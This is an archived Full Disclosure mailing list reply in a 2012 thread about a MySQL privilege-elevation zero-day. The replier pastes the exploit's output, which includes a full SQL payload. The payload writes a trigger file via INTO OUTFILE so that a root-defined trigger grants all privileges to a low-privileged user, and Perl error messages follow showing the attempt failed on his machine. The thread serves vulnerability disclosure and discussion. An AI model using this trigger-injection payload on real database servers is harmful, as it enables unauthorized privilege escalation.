Full Disclosure mailing list archives
Re: MySQL (Linux) Database Privilege Elevation Zeroday Exploit
From: Eren Yağdıran <erenyagdiran () gmail com>
Date: Mon, 3 Dec 2012 15:01:38 -0500
Hello guys i tried this zero day exploit on my local machine Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny16 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g Database client version: libmysql - 5.0.51a my exploit output is select 'TYPE=TRIGGERS' into outfile'/var/lib/mysql/ieee/rootme.TRG' LINES TERMINATED BY '\ntriggers=\'CREATE DEFINER=`root`@`localhost` trigger atk after insert on rootme for each row\\nbegin \\nUPDATE mysql.user SET Select_priv=\\\'Y\\\', Insert_priv=\\\'Y\\\', Update_priv=\\\'Y\\\', Delete_priv=\\\'Y\\\', Create_priv=\\\'Y\\\', Drop_priv=\\\'Y\\\', Reload_priv=\\\'Y\\\', Shutdown_priv=\\\'Y\\\', Process_priv=\\\'Y\\\', File_priv=\\\'Y\\\', Grant_priv=\\\'Y\\\', References_priv=\\\'Y\\\', Index_priv=\\\'Y\\\', Alter_priv=\\\'Y\\\', Show_db_priv=\\\'Y\\\', Super_priv=\\\'Y\\\', Create_tmp_table_priv=\\\'Y\\\', Lock_tables_priv=\\\'Y\\\', Execute_priv=\\\'Y\\\', Repl_slave_priv=\\\'Y\\\', Repl_client_priv=\\\'Y\\\', Create_view_priv=\\\'Y\\\', Show_view_priv=\\\'Y\\\', Create_routine_priv=\\\'Y\\\', Alter_routine_priv=\\\'Y\\\', Create_user_priv=\\\'Y\\\', Event_priv=\\\'Y\\\', Trigger_priv=\\\'Y\\\', ssl_type=\\\'Y\\\', ssl_cipher=\\\'Y\\\', x509_issuer=\\\'Y\\\', x509_subject=\\\'Y\\\', max_questions=\\\'Y\\\', max_updates=\\\'Y\\\', max_connections=\\\'Y\\\' WHERE User=\\\'ieee\\\';\\nend\'\nsql_modes=0\ndefiners=\'root@localhost\'\nclient_cs_names=\'latin1\'\nconnection_cl_names=\'latin1_swedish_ci\'\ndb_cl_names=\'latin1_swedish_ci\'\n';DBD::mysql::db do failed: Access denied for user 'ieee'@'localhost' (using password: YES) at org.pl line 31. DBD::mysql::db do failed: Access denied for user 'ieee'@'localhost' (using password: YES) at org.pl line 32. DBD::mysql::db do failed: Lost connection to MySQL server during query at org.pl line 35. DBD::mysql::db do failed: Lost connection to MySQL server during query at org.pl line 44. DBD::mysql::db do failed: Access denied; you need the CREATE USER privilege for this operation at org.pl line 52. DBD::mysql::db do failed: Access denied for user 'ieee'@'localhost' (using password: YES) at org.pl line 53. DBD::mysql::db do failed: Lost connection to MySQL server during query at org.pl line 54. DBI connect('host=localhost;','rootedbox2',...) failed: Access denied for user 'rootedbox2'@'localhost' (using password: YES) at org.pl line 58 Can't call method "prepare" on an undefined value at org.pl line 62. I think its not working. On Sat, Dec 1, 2012 at 4:26 PM, king cope <isowarez.isowarez.isowarez () googlemail com> wrote:
(see attachment) Cheerio, Kingcope
-- - Eren Yağdıran http://www.about.me/eren _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- MySQL (Linux) Database Privilege Elevation Zeroday Exploit king cope (Dec 01)
- Re: MySQL (Linux) Database Privilege Elevation Zeroday Exploit Michael Wood (Dec 01)
- Re: MySQL (Linux) Database Privilege Elevation Zeroday Exploit Kurt Seifried (Dec 02)
- Re: MySQL (Linux) Database Privilege Elevation Zeroday Exploit Eren Yağdıran (Dec 04)
- <Possible follow-ups>
- Re: MySQL (Linux) Database Privilege Elevation Zeroday Exploit kai (Dec 05)